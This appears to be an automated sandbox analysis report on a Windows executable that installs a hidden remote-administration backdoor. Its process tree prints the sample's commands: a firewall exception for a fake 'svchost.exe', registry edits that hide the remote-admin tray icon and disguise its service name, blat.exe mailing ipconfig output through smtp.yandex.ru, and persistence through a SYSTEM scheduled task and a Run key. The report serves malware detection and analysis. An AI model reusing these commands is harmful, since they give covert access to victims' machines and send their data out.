94d541e0b87e610a71aeec6f8ffa07b9007612f65233ed78ac16cffda98e05e3

Analysis

max time kernel
165s
max time network
188s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2023 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79b1d9fa564a09c901a738dc23e5a409.exe
Size

405KB
MD5

79b1d9fa564a09c901a738dc23e5a409
SHA1

eadbc4f609b6b073519664660527d77a2f1c1b06
SHA256

94d541e0b87e610a71aeec6f8ffa07b9007612f65233ed78ac16cffda98e05e3
SHA512

3a3ba57c5626d22dad4a507b178a5b80798a89bff7706113968995bc3d4e20d90d6d48776ea3419459cded77861bdbd37265b426b96a53f9a3621570fb22c565
SSDEEP

6144:TbXE9OiTGfhEClq97Q9+L7cWSUezPknw5zsQu0M7hA37E1L42Yz4UFGbjKfm8fpC:fU9Xiuim30zmGVVM7hAonZhyX4CmD

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
1116	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation	79b1d9fa564a09c901a738dc23e5a409.exe

Executes dropped EXE 6 IoCs

pid	Process
4620	cmdow.exe
2948	svchost.exe
2872	svchost.exe
4572	svchost.exe
4168	blat.exe
2704	blat.exe

Loads dropped DLL 3 IoCs

pid	Process
2948	svchost.exe
2872	svchost.exe
4572	svchost.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\blat.exe	cmd.exe
File created	C:\Windows\SysWOW64\install.bat	cmd.exe
File opened for modification	C:\Windows\SysWOW64\install.bat	cmd.exe
File created	C:\Windows\SysWOW64\blat.exe	cmd.exe
File created	C:\Windows\SysWOW64\blat.lib	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.lib	cmd.exe
File created	C:\Windows\SysWOW64\blat.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.dll	cmd.exe
File created	C:\Windows\SysWOW64\ip.txt	cmd.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\raddrv.dll	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\íåëëè.txt	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\blat.exe	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\install.bat	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\blat.lib	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\cmdow.exe	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\svchost.exe	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\admdll.dll	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\blat.dll	79b1d9fa564a09c901a738dc23e5a409.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4720	schtasks.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3980	ipconfig.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3232	reg.exe
2084	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4620	cmdow.exe
4620	cmdow.exe
4620	cmdow.exe
4620	cmdow.exe
4620	cmdow.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3228 wrote to memory of 224	3228	79b1d9fa564a09c901a738dc23e5a409.exe	93
PID 3228 wrote to memory of 224	3228	79b1d9fa564a09c901a738dc23e5a409.exe	93
PID 3228 wrote to memory of 224	3228	79b1d9fa564a09c901a738dc23e5a409.exe	93
PID 224 wrote to memory of 4620	224	cmd.exe	95
PID 224 wrote to memory of 4620	224	cmd.exe	95
PID 224 wrote to memory of 4620	224	cmd.exe	95
PID 224 wrote to memory of 1116	224	cmd.exe	96
PID 224 wrote to memory of 1116	224	cmd.exe	96
PID 224 wrote to memory of 1116	224	cmd.exe	96
PID 224 wrote to memory of 3232	224	cmd.exe	97
PID 224 wrote to memory of 3232	224	cmd.exe	97
PID 224 wrote to memory of 3232	224	cmd.exe	97
PID 224 wrote to memory of 2084	224	cmd.exe	98
PID 224 wrote to memory of 2084	224	cmd.exe	98
PID 224 wrote to memory of 2084	224	cmd.exe	98
PID 224 wrote to memory of 2948	224	cmd.exe	99
PID 224 wrote to memory of 2948	224	cmd.exe	99
PID 224 wrote to memory of 2948	224	cmd.exe	99
PID 224 wrote to memory of 2872	224	cmd.exe	100
PID 224 wrote to memory of 2872	224	cmd.exe	100
PID 224 wrote to memory of 2872	224	cmd.exe	100
PID 224 wrote to memory of 4168	224	cmd.exe	102
PID 224 wrote to memory of 4168	224	cmd.exe	102
PID 224 wrote to memory of 4168	224	cmd.exe	102
PID 224 wrote to memory of 3980	224	cmd.exe	103
PID 224 wrote to memory of 3980	224	cmd.exe	103
PID 224 wrote to memory of 3980	224	cmd.exe	103
PID 224 wrote to memory of 2704	224	cmd.exe	106
PID 224 wrote to memory of 2704	224	cmd.exe	106
PID 224 wrote to memory of 2704	224	cmd.exe	106
PID 224 wrote to memory of 4720	224	cmd.exe	110
PID 224 wrote to memory of 4720	224	cmd.exe	110
PID 224 wrote to memory of 4720	224	cmd.exe	110
PID 224 wrote to memory of 3564	224	cmd.exe	112
PID 224 wrote to memory of 3564	224	cmd.exe	112
PID 224 wrote to memory of 3564	224	cmd.exe	112

C:\Users\Admin\AppData\Local\Temp\79b1d9fa564a09c901a738dc23e5a409.exe
"C:\Users\Admin\AppData\Local\Temp\79b1d9fa564a09c901a738dc23e5a409.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\install.bat" "
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\cmdow.exe
    cmdow @ /HID
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4620
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Windows\svchost.exe" "Remote Administrator Server" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:1116
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    3⤵
    - Modifies registry key
    PID:3232
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
    3⤵
    - Modifies registry key
    PID:2084
- - C:\Windows\svchost.exe
    "C:\Windows/svchost.exe" /install /silence
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2948
- - C:\Windows\svchost.exe
    "C:\Windows/svchost.exe" /start
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2872
- - C:\Windows\SysWOW64\blat.exe
    C:\Windows/system32/blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u sbst3 -pw 199433
    3⤵
    - Executes dropped EXE
    PID:4168
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:3980
- - C:\Windows\blat.exe
    blat.exe C:\Windows/system32/ip.txt -to [email protected].
    3⤵
    - Executes dropped EXE
    PID:2704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr C:\Windows/system32\ip.bat
    3⤵
    - Creates scheduled task(s)
    PID:4720
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v "install" /t REG_SZ /d "C:\Windows\system32\install.bat" /f
    3⤵
    PID:3564

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" /service
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\blat.dll

Filesize
120KB

MD5
724cae63522f6e5f7565a3bf4b2a719b

SHA1
18620dbd4357d85918070f669ff4b61755290757

SHA256
b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779

SHA512
af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d

Download Submit
C:\Windows\SysWOW64\blat.exe

Filesize
112KB

MD5
31f84e433e8d1865e322998a41e6d90e

SHA1
cbea6cda10db869636f57b1cffad39b22e6f7f17

SHA256
aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

SHA512
7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Download Submit
C:\Windows\SysWOW64\blat.lib

Filesize
2KB

MD5
3cd3cffda2b5108e2778f94429c624d6

SHA1
3e4d218d1b8eb4fa1ab5152b126951892aff3dc9

SHA256
b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff

SHA512
c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79

Download Submit
C:\Windows\SysWOW64\ip.txt

Filesize
1023B

MD5
53e1608c8a0c432989fa74806c0f749a

SHA1
d40e37ea6336f05ce1e80e8338018c46077aff5a

SHA256
6dd915e76670bc0d59d5f346e4f66b6e121a767db5a36df8d01fa02bce16163f

SHA512
ff832b240338fd42cc27ccf52e820399c2d69af72d3968a051a330d3482d8a609367fa784e2aab7477b782cf83183fc10c72013f1e5d149de7dcc5c84adee1e3

Download Submit
C:\Windows\admdll.dll

Filesize
88KB

MD5
c915181e93fe3d4c41b1963180d3c535

SHA1
f35e66bec967d4254338a120eea8159f29c06a99

SHA256
d8fc5d545e684a4d5001004463f762d190bee478eb3a329f65998bad53d3c958

SHA512
2a5ceeb919546a713e172823da75e8f58c98c1dcedfaa7cacbd48af57bcb8da49c6289908c6c2a1bb6bda4cc7fac58adffae4a500dfe0c503397ca9aa8e92e21

Download Submit
C:\Windows\cmdow.exe

Filesize
30KB

MD5
48a78bf8ef453d9ca4d6c0587ae2de94

SHA1
fdcc71edb09d13165abb106dec95b5376cc05527

SHA256
319390597ae00859d5862aec261584cdb8e6c863c06ac69fecbe374165491756

SHA512
d30ff0df216637f1361fd76a0b18fbfc95f8917e04c2feef504edf57a2056d988d096a1de6189462971cbd718b61bcb7874860a38fd54bebf2970e90b37db11d

Download Submit
C:\Windows\install.bat

Filesize
1KB

MD5
aaad13943fea2367104a679600d6d521

SHA1
d66d093ff44e23dc72742593b7d60cc49f6da785

SHA256
cb6ce0aada73c92104ac9e3ea2f579e7ec8bd39eee0dbae8095907924b1aeada

SHA512
169085c1fcac120d94558f2e185be9f2d2b1f7101fd15c40f22b22b5a095265c40ebbd62691dd6c027ef8313600c5341bb7cf2f3d2b8075197700483dec5d591

Download Submit
C:\Windows\raddrv.dll

Filesize
28KB

MD5
b50d22ab0323cbd0fedfdf4689bc1301

SHA1
efd6ef059fa6ef25791e7ee660d63b05d0c11963

SHA256
970786caf18ef731b0e1a562e7155c7b7fe525fc000c14a6156ac19292922bc0

SHA512
91961bd7fe9744f56a1dde2123d78db428f3d7c1dd0155458a73e822f3073d5221e95cc4441d824b36b556765660ae781282c3c4d95e3a810abf4ff84c0c5bfc

Download Submit
C:\Windows\svchost.exe

Filesize
180KB

MD5
4da2155a683838f6d2ff544437fb76c8

SHA1
45c08891e4f811c3eee4d84474d7ca230b12f4ec

SHA256
0425a758ee783e178f0e3259cd07f7ba41f6fcca1146631636613d247809345b

SHA512
51228f948e8a2e94f8c8b6bf243557f4430003d72a6ae2388b34b60d904e257bab8e7287cc053d86f01e0011994f9007170d227d274f9d0aac6326a1643af54e

Download Submit
memory/2948-57-0x0000000000F50000-0x0000000000FA7000-memory.dmp

Filesize
348KB

Download
memory/3228-0-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/3228-38-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/4572-62-0x0000000001020000-0x0000000001077000-memory.dmp

Filesize
348KB

Download
memory/4572-71-0x0000000001020000-0x0000000001077000-memory.dmp

Filesize
348KB

Download